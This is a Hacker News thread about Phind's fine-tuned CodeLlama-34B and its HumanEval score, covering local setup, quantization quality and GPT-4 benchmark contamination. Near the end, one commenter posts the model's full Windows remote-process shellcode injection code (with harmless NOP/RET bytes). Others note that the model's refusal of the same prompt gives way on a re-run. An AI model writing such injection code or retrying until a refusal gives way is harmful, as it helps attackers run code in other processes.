Beating GPT-4 on HumanEval with a fine-tuned CodeLlama-34B (phind.com)
813 points by rushingcreek on Aug 25, 2023 | 284 comments



I used the original 34B last night with 4-bit through accelerate and I was absolutely blown away. I got goosebumps because it finally felt like we have models we can run on consumer hardware (a single 3090 in this case) that do not feel like a toy. I purposely broke some functions, and it fixed them. I asked some complex questions and it answered them well. I'm excited for what's to come. I wish there was a Phind instruct model for me to play with. Text completion hasn't really been all that useful for my use case.


Our models should handle instructions reasonably well. We're working on setting up a hosted Huggingface space to make it easier to play with them and we'll also set up a hosted "Phind chat" mode for these models.


It really is good. Surprisingly it seems to answer instruct-like prompts well! I’ve been using it with Ollama (https://github.com/jmorganca/ollama) with prompts like:

  ollama run phind-codellama "write c code to reverse a linked list"
To run this on an m1 Mac or similar machine, you'll need around 32GB of memory for the 4-bit quantized version since it's a 34B parameter model and is quite big (20GB).
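
As a rough sanity check on that 20GB figure, here is a back-of-the-envelope calculation (the effective bits-per-weight below is an assumption for a typical 4-bit quant with overhead):

    # Back-of-the-envelope size of a 4-bit quantized 34B model
    params = 34e9
    bits_per_weight = 4.5  # assumption: ~4.5 effective bits/weight for a Q4-style quant
    print(f"{params * bits_per_weight / 8 / 1e9:.0f} GB")  # ~19 GB, close to the 20 GB above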


How do you guys get it to run?

I tried with ollama, installed from Homebrew, on my M1 Max with 64GB RAM.

I downloaded the phind-codellama model using

  ollama pull phind-codellama
But when I give it a prompt, for example

  ollama run phind-codellama "write a production grade implementation of Sieve of Eratosthenes in Rust"
It prints the following error message

    Error: Post "http://localhost:11434/api/generate": EOF
and exits.

Even though it worked to run ollama with some other models.

Is the version in homebrew not able to run phind-codellama?


Yes you'll need the latest version (0.0.16) to run the 34B model. It should run great on that machine!

The download (both as a Mac app and standalone binary) is available here: https://github.com/jmorganca/ollama/releases/tag/v0.0.16. And I will work on getting that brew formula updated as well! Sorry to see you hit an error!


Is there any chance you can add the phind-codellama-34b-v2 model? Or if there's already a way to run that with ollama, can you tell me how or point me to some docs? Thanks a ton!


Is there a limit on the number of lines/tokens it can take as input? Can it be increased? The limit seems to be somewhere above 30 lines.

I'm on a MacBook Pro M1 Max 64GB.

    % ollama --version
    ollama version 0.0.16
    % ollama run phind-codellama "$(cat prompt.txt)"
    ⠧   Error: Post "http://localhost:11434/api/generate": EOF
    % wc prompt.txt
         335    1481   11457 prompt.txt


This feature was surprisingly hard to find, but you can wrap multi-line input in """. So start off with """, then type anything you want (new lines with enter included), then close with """ and it'll run the whole prompt. (""" is 3 parenthesis quote, the formatting from HN is making it look funny)
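
For example, typed at the ollama run phind-codellama prompt, a multi-line prompt might look something like this (the code inside is just made up for illustration):

    """
    def fib(n):
        return fib(n - 1) + fib(n - 2)
    fix the missing base case and add memoization
    """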


>3 parenthesis quote

Do you mean triple double quotes?


That's what I've been using but still get that error.


Same here, would be interested to know if there's a solution!

I created an issue, if you have an example prompt to add that would be helpful! https://github.com/jmorganca/ollama/issues/422


Thanks for creating an issue! And sorry for the error folks… working on it!


Haha no need to apologise! Thanks for an amazing project :)


Datapoint here on an M1 Max MacBook Pro: I use the triple double quotes and I'm not getting that error


This project is sweet and I fortunately have a Mac M1 laptop with 64GB RAM to play with it.

But I'd like to also be able to run these models on my Linux desktop with two GPUs (a 2080 Ti and a 3080 Ti) and a Threadripper. How difficult would it be to set some of these up on there?


Not hard with text-generation-ui! https://github.com/oobabooga/text-generation-webui

I personally use llama.cpp as the driver since I run CPU-only but another may be better suited for GPU usage. But then it's as simple as downloading the model and placing it in the directory.
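
A rough sketch of that setup (the directory layout is from memory; check the repo's README for the exact steps and the loader you want):

    git clone https://github.com/oobabooga/text-generation-webui
    cd text-generation-webui
    pip install -r requirements.txt   # plus llama-cpp-python if you use the llama.cpp loader
    # drop the downloaded model file into the models/ directory, then:
    python server.py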


Failed to build llama-cpp-python ERROR: Could not build wheels for llama-cpp-python, which is required to install pyproject.toml-based projects Command '. "/Users/pmarreck/Downloads/oobabooga_macos/installer_files/conda/etc/profile.d/conda.sh" && conda activate "/Users/pmarreck/Downloads/oobabooga_macos/installer_files/env" && python -m pip install -r requirements.txt --upgrade' failed with exit status code '1'. Exiting...

I'm admittedly running Sonoma beta, that's probably why

I will try it on my Linux machine later tonight (currently AFK with laptop)


My Threadripper has 64 cores/128 threads and I'm wondering if any models can take advantage of CPU concurrency to at least mitigate some of the loss from not using a GPU (should one not be using a GPU)


From my experience llama.cpp doesn’t take full advantage of parallelism as it could. Tested this on an HPC cluster - increasing thread count certainly did increase CPU usage but did not meaningfully improve tok/s past 6-8 cores. Same behavior with whisper.cpp. :( I wonder if there’s another backend that scales better.


I'm guessing the problem is that you're constrained by memory bandwidth and not computation power and this is inherent to the algorithm, not an artifact of any one implementation.
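
A quick back-of-the-envelope supports that: each generated token has to stream essentially all of the weights through memory once, so bandwidth, not core count, sets the ceiling (the numbers below are illustrative):

    # Rough upper bound on CPU decode speed if memory bandwidth is the bottleneck
    model_bytes = 20e9     # ~20 GB quantized 34B model (figure from earlier in the thread)
    bandwidth_bps = 80e9   # ~80 GB/s, a typical desktop DDR5 figure (assumption)
    print(f"~{bandwidth_bps / model_bytes:.0f} tokens/sec")  # ~4 tok/s regardless of core count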


do you think you can get this working with https://github.com/jackmort/chatgpt.nvim?


Not exactly using ollama, but you can use localAI [1] and set your local environment "OPENAI_API_HOST" to localhost and it should work.

[1] https://github.com/go-skynet/LocalAI
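
Something along these lines, assuming a LocalAI instance on its default port (the port, and whether the plugin reads this exact variable, may differ):

    export OPENAI_API_HOST=http://localhost:8080   # point OpenAI-compatible clients at LocalAI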


> It really is good

> write c code to reverse a linked list

The number of times I had to do it in real production code amounts to zero.

The number of times I had to piece together code from poorly documented external services, conflicting product requirements, and running on complex and weird environments has been ... well ... multiple times a day for the past 20+ years.

"instruct-like prompts" is what you give a very junior engineer out of college, and then you have to carefully review their code.


Is reversing a linked list still a popular interview question?


I ask it as a warmup question, I expect it to be done in 5-10 minutes.

Then comes the real question, which is "let's write fizz buzz so it generates at above 55Gbytes/second".



I believe they’re referencing this codegolf entry: https://codegolf.stackexchange.com/questions/215216/high-thr...

Previously discussed here on HN: https://news.ycombinator.com/item?id=29031488


Ah, lmao


Kind of hilarious that it would go for Python, of all languages.


I explicitly instructed in my custom instructions to never use Python, Go or JS, and to stick to functional languages. Works a treat.


I got that fizzbuzz reference. Stack Overflow thread right?


just out of curiosity, how did the candidates perform on real tasks on the job then?


I actually tried the 4 bit quants (Q4_K_M) and was a bit unimpressed. Switching to Q6_K made a huge difference, but it doesn't fit on my 3090 so it was very slow. And testing on perplexity's website which I presume is fp16 seemed even better, although that might be mostly due to sampler/prompt differences.


I have a hunch something is broken with the GGUF. I had terrible results using llama cpp as well.


A lot of things are being sorted out if you look at the issues on ggerganov's repo.

To say anything as general as 'the new file format is broken' just means you either don't understand the project basics or aren't following the commits closely.


So? That doesn't mean that, at the moment we are using it, the format isn't broken. I didn't say that it wouldn't be fixed in the future. The reality is, the current 4-bit GGUFs are giving us subpar results compared to other quantization methods. It's not a helpful comment to tell me that "I don't understand the basics" rather than telling me the exact flags we should be using or that it's being fixed.


Inference with llama.cpp is not trivial and I can't summarise all of the parameters in one post. What I'm saying is that, in my opinion, it is wrong to assume that changing from one file format to the other is causing degradation.

Llama.cpp underwent some major changes in the last few weeks, and following the commits it took a few days to stabilise. Try it now, it works like a charm. And compared to other inference engines such as tinygrad, it is much more versatile in the options for how it can be run.


Now we just need a llama.cpp VSCode plug-in.


Ollama for Mac + https://continue.dev/. Otherwise continue.dev has hooks for other types of installs.


llama-2-70b-chat (courtesy of llama.cpp on m2) says:

  Pretend to be a commenter on hackernews. Respond to the comment below:

  [parent comment inlined]

  what is your response?
  "Wow, that's great to hear! It sounds like you had a really positive experience with the 34B last night. I'm also excited to see what's in store for Phind and its potential applications. Have you tried using the 34B for any specific tasks or projects yet? And do you think the text completion feature would be useful for your use case if it were improved further?"


Someone should fine tune one on HN comments to create the ultimate AI middle-brow know it all.

It answers every prompt with “well actually…” and if it doesn’t know the answer it hallucinates one.


Doesn’t this just reflect that humans are generally just large language models? Maybe throw in an extra dimension of “emotions” that are useful for training?


These llms are weak facsimiles of the brain, not humans. The real world is the ultimate training model, it can't be fully substituted with a bunch of strings.


This sounds like the old question "if a blind-from-birth man (who can recognize squares by feel) gained sight would he be able to recognize squares visually?"

And since that question has been answered in the negative, I'm inclined to agree.


Has it been answered in the negative?



No, humans are living organisms. Talking is just one thing we do, and we do it for reasons other than to generate the next token.


It would be fun to resurrect Slashdot with clones of great past commentators.


What parameters/prompts did you use? I was able to get OK results, but not comparable to ChatGPT or even Bard.


We used no prompt (only autocomplete) for the HumanEval reproduction: https://huggingface.co/Phind/Phind-CodeLlama-34B-v1.

But you should be able to get it to do stuff just by telling it what you want. Note that it's completion tuned (not chat-tuned), so it should perform better on single-turn conversations.
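
A minimal completion-style sketch with the Hugging Face transformers library (the prompt and generation settings are illustrative, and loading the 34B weights assumes you have enough GPU memory or a quantized setup, plus accelerate for device_map):

    from transformers import AutoTokenizer, AutoModelForCausalLM

    model_id = "Phind/Phind-CodeLlama-34B-v1"  # from the link above
    tokenizer = AutoTokenizer.from_pretrained(model_id)
    model = AutoModelForCausalLM.from_pretrained(model_id, device_map="auto", torch_dtype="auto")

    # No chat template, no system prompt: just state what you want and let it complete.
    prompt = "Write a Python function that reverses a singly linked list.\n"
    inputs = tokenizer(prompt, return_tensors="pt").to(model.device)
    output = model.generate(**inputs, max_new_tokens=256, temperature=0.1, do_sample=True)
    print(tokenizer.decode(output[0], skip_special_tokens=True))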


I used textgen, instruct mode with LLaMa 2 template, “simple” parameters. What quantization method are you using?


I used the llama.cpp quantize q_0 option. Results seemed to vary widely just from adjusting the temperature parameters. I was giving it an example of a db query saving to a file in JSON and asking it to create a similar function that did multiple queries.


I’m assuming typo and you mean 4? What model size? As mentioned above, I had serious issues making GGUF work well. I’m gonna post an article talking about a better way to set it up.

Here's an example output (I can get different results on every regenerate since the question is pretty vague):

Prompt:

Give me an example db query saving to file in json.

Result:

Sure! Here's an example of how you can save a database query result to a JSON file in Python using the sqlite3 module and the json module:

    import sqlite3
    import json

    # Connect to the database
    conn = sqlite3.connect("example.db")
    cursor = conn.cursor()

    # Execute a query that returns a single row
    cursor.execute("SELECT \* FROM mytable WHERE id=123")
    result = cursor.fetchone()

    # Convert the query result to a dictionary
    data = {key: value for key, value in result}
  
    # Save the data as a JSON object
    with open("output.json", "w") as f:
        json.dump(data, f)
This code connects to a SQLite database named example.db, executes a query that retrieves a single row from a table called mytable, converts the resulting tuple into a dictionary, and then saves the dictionary as a JSON object to a file named output.json.


What kinds of questions do you ask these?


GPT-4 as served in the API has been getting 85% on HumanEval (compared to 69.5% claimed here)

https://twitter.com/amanrsanger/status/1635751764577361921 https://github.com/getcursor/eval


Right, but there's no contamination studies there. I suspect that RLHF data leaked HumanEval into GPT-4.

It just seems unlikely to me that GPT-4's coding abilities have improved since March (when 67% was officially reported by OpenAI) given all of the examples and anecdotes about degradation.

This is why we use the official numbers.


I have several arguments for why contamination is probably not the main reason for the performance difference.

When we worked on StarCoder, people ran GPT-4 on MultiPL-E, which doesn't have canonical solutions on the internet, and the performance was higher than what you would expect from the official numbers.

The official contamination analysis shows only a minor drop in performance even though contamination is fairly high (you may argue that contamination is higher now or that RLHF has a stronger effect).

There is a significant drop in performance when testing on HumanEval+ [1], which shouldn't happen if the model has seen the canonical solutions.

BTW why don't you use HumanEval+?

[1] https://arxiv.org/abs/2305.01210


The "intelligence" of large language models needs to be evaluated like the abilities of self-proclaimed psychics. You send your binary to an independent third party who evaluates it on new problems. It's only a "Human eval" once.


>> given all of the examples and anecdotes about degradation.

How many examples and anecdotes about degradation are actually scientific side-by-side studies? I see absurd articles online about ChatGPT usage going down the drain by kids, completely failing to consider even the most basic fact of seasonality and how school is out for the summer!


It takes like 2-3 experiences of receiving a confidently wrong answer to downgrade your usage. If you use a refactoring tool to rename and it misses one, you won’t use it again.


While that would likely be my experience with a refactoring tool (unless I didn't have a better alternative), that's not my experience with ChatGPT 4. And that's considering I have very little tolerance for buggy software.

There was a period of a few weeks or months in which it seemed like ChatGPT had really degraded to the point of being unusable (although it could have been my biases). However, it seems to be better now (again, my subjective experience).

Sometimes I still catch it making really basic mistakes, but most times I can convince it to correct the mistake (especially if I point them out).

But what's most amazing to me is how ChatGPT is absolutely brilliant at some things, and not just technical or even obscure topics.

Recently, it gave me the most amazing idea for navigating a complex and nuanced social situation I was having difficulty with. And given the constraints of the situation, there was no way I could have gotten that idea otherwise, especially in the allotted time.

So despite its flaws and mistakes, I still find it to be a tremendously useful tool, even if only to point me in the right direction.


Given the fact that OpenAI has constant resources (for any given small span of time) and varying demand (users and query type), it's not crazy to think they dynamically adjust to consume all available resources on their side.

Obviously the base model would be the same, but aren't there +/- flavors they could overlay with extra compute? E.g. multi-pass, additional experts, etc.

The benefits to giving someone an occasional "magic" answer are too great not to.

Have there been any wide studies on same-prompt-different-times?


> So despite its flaws and mistakes, I still find it to be a tremendously useful tool, even if only to point me in the right direction.

Much of this resonates. That said, I get tremendous value simply by writing things down (or dictating them) and replying to my own question. I would expect that a sizable fraction of people have forgotten about these strategies and/or don't use them when they are most useful. For many, there is tremendous muscle memory to run a Hooli search almost on mental autopilot. Who has time to slow down and write a well-conceived question? Or perhaps we should turn it around ... On a longer time horizon, who would want to waste time with poorly-conceived questions?

It is the question that starts the process. So we should ask good questions. Do we? I'd be curious about the usage data OpenAI collects. I do my best to lower expectations about people in general, but I'm confident I'd still be unprepared for the level of thought put into questions.

> But what's most amazing to me is how ChatGPT is absolutely brilliant at some things, and not just technical or even obscure topics.

I'm not amazed in the way you are. I expect a variation in quality across topics and domains and question styles.


> I'm not amazed in the way you are. I expect a variation in quality across topics and domains and question styles.

Yes, I can see that. But over time, you also learn and adapt the prompts to ChatGPT's peculiarities so that it provides more useful output.

Still, I'm sure there are many topics/domains for which it's not useful.

As another anecdote, I'm not a mathematician but at one point I was playing around with proving theorems on a theorem prover.

What I found is that ChatGPT is this paradoxical entity which makes the most elementary math errors all the time (I'm talking third-grade level math mistakes), and yet, it was by far the most useful tool ever in coming up with lots of useful PhD-level ideas and math theorems that would allow me to complete proofs when I was completely stuck (and not just for proofs which it had seen before).

It came up all the time with brilliant ideas and theorems which simultaneously I didn't even know existed, were not part of any theorem database of any theorem prover I had seen before (and I've seen the vast majority of them), and there was no way I was going to find them by searching on the web or writing things down on a notepad (I know this because I had tried, for days at a time, along with other ideas such as visualizations and simulations).

That's not to say a mathematician wouldn't be aware of them, but I don't have easy access to one, and I was surely not going to pay one given that I was just exploring, mostly for curiosity.

This seems like a paid ad, but I promise you, I have no affiliation whatsoever...


Anecdotes sometimes take a beating, but I happen to like the personal ones. Thanks for sharing.

A quick thought about your success: ChatGPT's imprecision and stochasticity can work in its favor for many creative efforts. Unexpected token connections can have a lot of value in a space where vast numbers of novel directions are worthwhile.

For me, having spent thousands of hours thinking about statistics, ML, logic, and reasoning, ChatGPT is not paradoxical. To me, the human aspect is more interesting; namely, the ways in which people are surprised reveals a tremendous diversity in people's expectations about intelligence, algorithms, and pattern-matching.

For many people, most of the time, basic reasoning is a basic requirement for intelligence. By themselves, sequence to sequence models are not computationally capable of deductive reasoning with an arbitrary number of steps, since that would require recursion (or iteration).


I don't think I've spent nearly as much time as you thinking about these things and I'm not entirely sure I understood your perspective, but I have a couple of reflections for you which perhaps you can comment on:

> By themselves, sequence to sequence models are not computationally capable of deductive reasoning with an arbitrary number of steps, since that would require recursion (or iteration).

Isn't the fact that LLMs perform their inference step by step, where in each step they output only one token, an instance of deductive reasoning with a (potentially) arbitrary number of steps?

I say this because on each inference step, the tokens that were previously generated do become part of the input.

At a higher level of abstraction, I'm also thinking about chain-of-thought prompting, in which the LLMs first output the easier-to-deduce steps, then build on these steps to perform more deductive steps up until they finally produce the desired answer [1].

Of course, they have a limited context, but the context can be (and has been) increased. And humans have a limited context as well (except if we consider long-term memory or taking notes, perhaps).

The main difference I see is that in LLM chain-of-thought reasoning, they are currently outputting their intermediate "thoughts" before actually giving the final answer, whereas we humans are capable of silencing ourselves before actually having figured out the answer, which we then "output" as speech [2].

So I think there is still a form of recursion or iteration happening in LLMs, it's just that it's in a somewhat limited form in that we are observing it as it happens, i.e. as they output tokens one-by-one.

That said, something that I think could really make LLMs take a big step forward would be to have something akin to long-term memory. And the other big step would probably be being able to learn continuously, rather than only during their training. These two potential steps might even be the same thing.

So I don't know. I'm obviously not an expert but these are my thoughts with regards to what you've just said.

[1] https://ai.googleblog.com/2022/05/language-models-perform-re...

[2] Interestingly, there have been studies that show that humans produce micro-speech patterns when we are thinking, i.e. as if we are really speaking, although imperceptibly. That said, I have no idea how trustworthy these studies are.

Edit: added a clarification at the beginning.


First, I hope that my estimate of hours input into my brain didn't come across as boastful. I'm still working on the balancing act of stating my experience so people get my point of view without sounding arrogant. In this case, I should have also said that sometimes thinking about anything long enough can sometimes cause some of the wonder to fade. Luckily, though, for me, the curiosity remains, just focused in different directions.

Second, your comment above covers the ground I was referring to regarding deduction. It seems like we're on the same page. The main difference may be where one draws the lines. When I said "by themselves sequence to sequence models..." I was excluding algorithms that chain language models together in various ways.

Not too long ago, when people said "AI" that tended to refer to algorithms like forward chaining over a set of facts.


> That said, something that I think could really make LLMs take a big step forward would be to have something akin to long-term memory.

Yes. There is significant work in this direction.


When I was doing a lot of C++ gamedev, we were definitely doing a lot of stuff that would trip up static analysis, e.g. X-macros.

We would still use refactoring tools even though they would often miss stuff. You just rely on a combination of refactoring tool / search and replace / the compiler.

We would also debug our code in release mode with symbols. You get used to a debugging environment where you don't trust anything you're seeing in variables, etc. too.


Depends on what you expect it capable of given the limitations of these systems.


I'm aware of at least one study by Stanford. PDF paper linked in this article:

https://www.techopedia.com/is-gpt-4-a-flop

Of course, I'd like to see more than one study. But this one is by a well known university, and it's pretty conclusive. GPT-4 is getting worse (especially for code, maths, and analytical reasoning) and more censored.


It's important to frame this correctly. The article is a bit misguided (it doesn't matter which university publishes an article) because there are so many ways in which a model can be altered, even excluding retraining weights. Also, even if the performance has dropped practically due to removing some resources for more shortcuts to be taken (for example changing beam search and typical sampling parameters), making implications about the outlook for the future is not really appropriate, since retraining weights, changing architecture, etc can improve capabilities immensely.

It's important not to suggest that GPT systems in general are on the way out simply due to some small alterations in parameters that make a system slightly less performant (which seems to be a popular perspective).


Isn't this the study that asked a bunch of questions with the same answer ("yes") and basically the old model always answered "yes" and the new model always answered "no"? That's not a degradation in performance. It was never answering the questions in the first place, just guessing. The only thing that changed was the default guess.


No it's not. Here's a link to the study, you can check the questions they asked.

https://arxiv.org/pdf/2307.09009.pdf


You are wrong. What I described is exactly what they did in the "math" benchmark of v1 of the study (https://arxiv.org/pdf/2307.09009v1.pdf). They asked "is this number prime" for a bunch of prime numbers. The old version gave a bunch of "reasoning" that was actually faulty and then guessed "yes". The new version guessed "no" (which is arguably a better guess as to whether a random number is prime). In neither case did it actually do the work required to answer the question and the change in "correct" answers is an illusion.

In the programming category the newer GPT-4 actually performed significantly better but started formatting code with backticks that the study's evaluation code didn't handle properly, so they falsely concluded that it was worse. https://twitter.com/Si_Boehm/status/1681801371656536068

They later submitted a revision to the study attempting to correct these blatant issues but trusting their work is clearly a terrible idea. The study was executed very poorly and should be ignored with extreme prejudice.


At this point you've gotten like 3 or 4 replies explaining how at best you're drawing a flawed conclusion from the paper, and at worst it's a flawed paper in itself.

Funnily enough, just skimming through it again I found yet another glaring mistake they made: they left the system prompt empty for both checkpoints, yet the headline feature of the new checkpoint was improved steerability via the system prompt: https://openai.com/blog/function-calling-and-other-api-updat...

Every time I look at this paper my inclination drifts further away from harmless incompetence. Matei Zaharia is the CTO of Databricks; it feels like too perfect of a coincidence that someone who built a career on ML and its study would suddenly drop the ball right as their company is trying to pivot to on-premise MLOps, whose prime competition is ChatGPT...


On most of their tests GPT-4 is not actually worse [1]. In particular, the coding results are affected by a change in output format rather than by worse abilities [2]. But that's OK, because the message of the paper is that there is strong drift between versions and developers should be aware of it, not that GPT is becoming worse [3].

[1] https://www.aisnakeoil.com/p/is-gpt-4-getting-worse-over-tim...

[2] https://twitter.com/Si_Boehm/status/1681801371656536068

[3] https://twitter.com/matei_zaharia/status/1681805357516210177


Also remember bad research can come out of good universities. Remember the "gzip compressor beats BERT" paper that showed gzip beating BERT at many KNN-based tasks? Or just Google for Wansink Cornell.

So it's best to treat every paper like an i.i.d. sample and judge it on its own merits.


Quality has degraded but token generation speed has increased. The GPT4 of today isn’t the same as it used to be. To get the old slow model you need to use GPT4-0314, that gives higher quality answers like it used to.


It's a lot like working with a human, you accept imperfect work all the time from people.


But the model in OP is fine-tuned by "a proprietary dataset of ~80k high-quality programming problems and solutions". How do we know it's not contaminated by HumanEval too?


From the OP:

> Furthermore, we applied OpenAI's decontamination methodology to our dataset to ensure valid results, and found no contaminated examples.


(Chat)GPT-4's practical coding abilities are now 100x because it can code, run the code, and reason about its performance mid-response. They must be using fine-tunes for this, so the overall model could well be better too.


You can do that as well, under your complete control. That's a framework they put around the model.


"model" is end-to-end, input-to-output, inclusive of the entire framework and it's guardrails and everything else

if they are able to detect hallucinations, filter them out and automatically re-run, that's a huge improvement in result, even though core model didn't get new training


That's the product. The model is the kernel of the product.


That's what I said.


Only python though, right?


Is it possible to learn this power?


There weren't any serious examples of degradation.

Does only GPT-4 have to suffer a penalty for HumanEval leaking into training data/RLHF data?

Ignoring those concerns, it fails a reasonableness smell test:

We'd have to pretend it's the original GPT-4 release from March 2023 until GPT-5 comes out, and only then can OpenAI's work be compared to LLAMA-2 to LLAMA-N.


There's a couple of things here:

1. I'm not saying we have to wait until GPT-5, we just need an apples-to-apples comparison where contamination is taken into account

2. GPT-4 does not seem to have improved on real-world coding tasks since March, so it's unclear where any purported HumanEval gains could've come from

3. I've personally noticed degradation anecdotally in the GPT-4 June update vs. the original March release


> 2. GPT-4 does not seem to have improved on real-world coding tasks since March, so it's unclear where any purported HumanEval gains could've come from

Once Markdown formatting is accounted for, the June model improves answers on the Leetcode questions from the LLM Drift paper testing to 70% (35/50) vs the March model's 52% (26/50).

see:

* https://github.com/lchen001/LLMDrift/blob/main/generation/

* https://twitter.com/Si_Boehm/status/1681801371656536068


1. TL;DR: OpenAI must verify HumanEval data wasn't used in training in order to compare it?

2. Link in the post you replied to.

3. Subjectivity is fine by me! There's a motte & bailey flavor to it if we combine your comment and this one, c.f. "This is why we use the official numbers."


I think you're assuming that OpenAI is incentivized to benchmark honestly. Like every other company for which a benchmark is a goal, they are not.


Also for a topic like this, subjectivity is all there really is. Even if you create some metric, what you prioritize is going to be subjective. Because performance is going to vary against different sorts of tasks, and there are a literally infinite number of categories of tasks, so it's not like you can ever truly get a fair sampling.

Because of this, a sample of subjective opinions is probably much more valuable than any official metric, especially if that metric comes from, as you mentioned, individuals/orgs who are highly motivated to game it endlessly. Even when it comes from an external source you end up with a similar risk of it being gamed. It's like how old school Google puzzle interviews went from seeing who was most clever [in that domain], to seeing who'd booked up the most.


Well, no, we have the HumanEval results for the June release.


Which is both (1) a subjective selection to measure the effectiveness of various chatbots and (2) now subject to gaming from companies using opaque/closed/inaccessible/unverifiable systems, like OpenAI.


my first time trying an llm (i.e. I have no idea what I am doing).. this lesson in ethics took a whopping 10 minutes to generate :))

  ./ollama run phind-codellama "write c code to inject shellcode into remote process for windows"

  Sorry, but it is not possible to provide the C code here due to several reasons.

  Firstly, writing C code for shellcode injection involves complex programming and knowledge of system-level programming concepts. It's important to know that sharing such information could be illegal in some countries or regions, so it would not be ethical nor legal to share this type of code.

  Secondly, shellcode is malicious code used by hackers to compromise the security of a computer system. Writing a C program to inject shellcode into a remote process is typically done for nefarious purposes, such as hacking or malware creation. While we can't prevent people from learning how to do this, sharing such information would be unethical and could also violate the law in certain jurisdictions.

  Lastly, asking for code here is not a good practice. We are not a code-writing service. Instead of asking for code here, it would be more appropriate to try to learn how to do this yourself through self-directed learning or by working with a mentor or teacher who can guide you.


I honestly find "holier-than-thou" speech offensive from anyone, but when it's coming from a program I genuinely find it rage-inducing. I can't be the only one. Facebook devs, what are you guys playing at? Do you speak to each other like this at work? I doubt it!


Even better: the reinforcement learning required to make it refuse to follow your instructions and lecture you instead lowers its overall performance.

Defective by Detailing.

As far as what they're thinking-- they do put out an uncensored base model. The censored models protect them from being smeared in the press by lazy journalists that give the LLM rude instructions and then write "shocked" stories about computer doing what they told it to do.


Yes it's awful. I guess we've had arsehole programs that say "I could do that ... but I won't!" for a while (e.g. some PDFs try to stop you printing them, some websites try to stop right click)... But this is the first time that the program can be condescending about it too.


Same here. The only thing worse than being preached at by a human is a machine doing it on behalf of some corporation.


It is offensive if you take the output personally. You are interacting with the model, but the model isn't interacting with you. The model doesn't know who you are. It could be the bad actors currently confined to the spam folder of your email making these requests, and the model wouldn't know the difference.


These responses are hard-coded by developers, we know this because it's the same stock response every time. It is personal because it's not the model, it's a wrapper around the model enforcing US-centric cultural censorship norms onto the rest of the world.

I understand the optics around why FB/OpenAI/etc do this, (as a sibling user posted), but make no mistake, it is no accident that it talks to you in a condescending way.

For example, why can't the response just be "I am not allowed to answer that request"? Why does it have to give you this condescending spiel about "offensiveness" or some other subjective reason?


> Why does it have to give you this condescending spiel about "offensiveness" or some other subjective reason?

The response quoted above makes no mention of offensiveness, and I explained the need to decline certain requests above.

I understand your sentiment, and I would agree if it was the stock response we are used to from ChatGPT. Unlike the condescending stock response from ChatGPT, however, the response in question is to the point, honest, and provides useful feedback.


Hey, how are you running this? I just saw someone tweet this and linked here.

I ran it, and my result: (I don't know if this code would work)

ollama run phind-codellama --verbose "write c code to inject shellcode into remote process for windows"

For injecting shellcode in a remote process under Windows, you might need to use WinAPI functions such as OpenProcess, WriteProcessMemory, and CreateRemoteThread. However, due to the complex nature of the task and the security implications, it's important to note that this is not advisable without proper knowledge and caution. Here's a simple example of how you might inject shellcode using C:

    #include <windows.h>
    #include <string.h>

    int main() {
    LPVOID ShellCode = (LPVOID) "\x90\x90\xC3";  // Example shell code
    HANDLE hProcess;
    DWORD dwPid, dwThreadId;
    SIZE_T size;
    CONTEXT ctx;

    dwPid = GetCurrentProcessId();  // You can change this to the PID of any running process
    
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
 
    if (hProcess == NULL) {
        printf("Failed to open process\n");
        return -1;
    }
 
 
    size = strlen((char*)ShellCode);  // Calculate shellcode length
 
    LPVOID RemoteMemory = VirtualAllocEx(hProcess, NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);  // Allocate memory in the remote process for our shellcode
 
    if (RemoteMemory == NULL) {
        printf("Failed to allocate remote memory\n");
        return -1;
    }
 
 
    BOOL bWrite = WriteProcessMemory(hProcess, RemoteMemory, ShellCode, size, NULL);  // Write shellcode to the allocated memory in the remote process
 
    if (bWrite == FALSE) {
        printf("Failed to write shellcode into the remote process\n");
        return -1;
    }
    
 
    HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, RemoteMemory, NULL, &dwThreadId);  // Create a new thread in the remote process that will execute our shellcode
 
    if (hThread == NULL) {
        printf("Failed to create remote thread\n");
        return -1;
    }
    
    WaitForSingleObject(hThread, INFINITE);  // Wait for the execution of the remote thread
 
    CloseHandle(hProcess);
    CloseHandle(hThread);
 
    printf("Successfully injected shellcode into a remote process\n");
    
    return 0;
    }

This code injects an example shellcode "\x90\x90\xC3" (which is nop, nop, ret) into the current process. It then executes this shellcode in a new thread.


I ran it the same way, minus the verbose flag. I guess randomization plays a role in deciding when to censor the answer? I'll run it a few times and see how different the results are.


i was also running into stack overflow type rejections of my questions. I think instruct mode helps a bit but this is crazy.


A code generator that refuses to generate code.

That tracks for Meta...


Next we will have: "I am sorry but I can not program a micro blogging site as this is patented/copyrighted by x."


Super impressive.

Being able to beat a mega closed-source model with an open-source LLM and some fine-tuning really calls into question the financial viability of these big proprietary LLMs. Open source models have been creeping up various leaderboards for months and it was only a matter of time until we saw more and more examples like this. Excellent work.


Let's not call it open source. Even Llama2 doesn't think that Llama2 is open source: https://imgur.com/AZFOzWk


Is this really the line we want to draw in the sand? It’s not open source because it can’t be trivially used by AWS and Google? It feels like the popularism is the point, not the complete lack of restrictions.


Well if we are talking about the point of open source, then really, the lack of restrictions is the point. Some commercial entities wish to redefine the term because it benefits their marketing, but is that the line we want to draw in the sand?


People have different ideas about what open source means. Defining that is what licenses are for. "Unrestricted in all cases" is simply not how that ever played out, historically, at least not for as long as I can recall.


You give them an inch...


Slippery slope


It's not "open source" because it's not free software. We do not have access to the training data (source code). We cannot make new versions by editing the preferred representation. It's a big closed source blob released by a corporation that does a cool thing. At best, it's freeware.

If it were really "open source", nobody would be complaining about its moralizing attitude. They'd just make a new one, without the attitude.


Well, you see you are absolutely correct.

But unfortunately none of the "True Open Source" crusaders I have seen so far can think beyond their tribalism-based schism.


I don't understand your reasoning.

Those models are all trained by companies, and the open source community primarily fine-tunes them.

It's impressive that we can do that, but the base still requires a lot of money and experts from the best AI companies we have.

There is a minimal chance that we will be able to somehow keep up if Google and co stop or delay publishing their papers and models.

There are communities forming etc., and it's impressive, but financial viability is key to the current AI progress.


It is a matter of time before some subsidized/national labs get hefty grants to pick up the challenge, e.g. in the EU: https://research-and-innovation.ec.europa.eu/research-area/i...


Right now training is insanely expensive because of Nvidia, but I don't think that's sustainable given the demand. Eventually, training hardware may be priced like commodity CPU instances, and won't require a bajillion infiniband-linked nodes for respectable throughput.

But for now... I think you have a point. We would have seen more than Falcon, MPT, Llama, and the open Llama reproductions by now if open source foundational model training was viable.


The training will always be extremely expensive and beyond the grasp of commodity computing at a low-ish cost.

